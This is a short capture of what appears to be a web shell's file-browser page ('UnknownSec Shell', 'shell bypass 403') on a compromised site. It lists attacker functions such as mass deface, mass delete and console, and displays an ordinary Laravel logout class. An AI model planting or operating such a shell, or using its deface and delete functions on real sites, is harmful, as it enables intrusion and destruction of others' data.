shell bypass 403
UnknownSec Shell
:
/
home
/
forge
/
socialite.brannanatkinson.com
/
app
/
Livewire
/
Actions
/ [
drwxrwxr-x
]
upload
mass deface
mass delete
console
info server
name :
Logout.php
<?php namespace App\Livewire\Actions; use Illuminate\Support\Facades\Auth; use Illuminate\Support\Facades\Session; class Logout { /** * Log the current user out of the application. */ public function __invoke(): void { Auth::guard('web')->logout(); Session::invalidate(); Session::regenerateToken(); } }
© 2026 UnknownSec